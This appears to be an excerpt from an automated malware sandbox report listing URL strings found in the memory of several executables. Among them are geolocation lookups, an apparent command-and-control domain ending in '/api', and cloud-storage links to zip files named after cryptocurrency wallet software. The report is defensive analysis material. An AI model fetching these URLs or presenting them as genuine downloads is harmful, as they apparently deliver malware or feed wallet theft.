Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AF8000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893590561.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/OO
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/W
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B1A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000002.2886690972.000002B0C3880000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B5D000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonC
Source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonU
Source: cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsong0
Source: cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonk0
Source: cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonp
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/jsonv
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missi
Source: cc6f25572f.exe, 00000011.00000003.2893590561.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D669962000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893986924.000001D66A35A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: cc6f25572f.exe, 00000011.00000003.2893590561.000001D669972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missingauth$z
Source: cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D6698C8000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D6698C0000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1ACB000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2718890481.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793126101.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/
Source: cd2469328d.exe, 0000000B.00000003.2792015764.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D2F000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/L
Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2685932804.0000000003537000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2686008403.000000000353B000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/api
Source: cd2469328d.exe, 0000000B.00000003.2660750223.000000000353F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apiShsw-
Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/apij
Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/bu
Source: cd2469328d.exe, 0000000B.00000003.2770485636.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2770600450.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2793080227.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pancakedipyps.click/pi
Source: cc6f25572f.exe, 00000011.00000003.2767490885.000001D66993D000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767120337.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766706272.000001D669904000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766455096.000001D66990B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsCCAD43E
Source: cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsE89A621rro
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767120337.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766706272.000001D669904000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766455096.000001D66990B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js.p
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js;
Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: cd2469328d.exe, 0000000B.00000003.2614023594.0000000003591000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691843677.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3571306785.0000000006121000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3668818148.0000000005551000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: cd2469328d.exe, 0000000B.00000003.2614023594.000000000358F000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638485211.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614149106.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614417713.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638302429.0000000003588000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714805918.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714653633.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714471606.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691843677.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616753929.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3571306785.0000000006121000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3618406974.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616239893.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 35f0a75b93.exe, 0000002B.00000003.3799410374.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3668818148.000000000554F000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691385905.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691659491.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669663163.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.0000000005505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: cd2469328d.exe, 0000000B.00000003.2614149106.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.00000000060F5000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.00000000054E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: cd2469328d.exe, 0000000B.00000003.2614023594.000000000358F000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638485211.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614149106.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2614417713.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2638302429.0000000003588000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714805918.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714653633.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2714471606.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691843677.0000000005E90000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E89000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616753929.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3571306785.0000000006121000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3618406974.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3616239893.000000000611A000.00000004.00000800.00020000.00000000.sdmp, 35f0a75b93.exe, 0000002B.00000003.3799410374.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3668818148.000000000554F000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691385905.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3691659491.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669663163.0000000005505000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.0000000005505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: cd2469328d.exe, 0000000B.00000003.2614149106.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691944256.0000000005E64000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3572812328.00000000060F5000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3669129539.00000000054E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: 5cda6c90d7.exe, 0000000C.00000003.2635749379.000000000180C000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2636000487.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 5cda6c90d7.exe, 0000000C.00000003.2635749379.000000000180C000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2636000487.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: cc6f25572f.exe, 00000010.00000003.2756924171.000002B0C1B4A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754614693.000002B0C1B36000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756665074.000002B0C1B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/c
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767858563.000001D669944000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766754549.000001D669938000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767490885.000001D66993D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/earch
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: cc6f25572f.exe, 00000010.00000003.2756451385.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756608703.000002B0C1B27000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2755467748.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756871989.000002B0C1B2E000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766754549.000001D669938000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/o
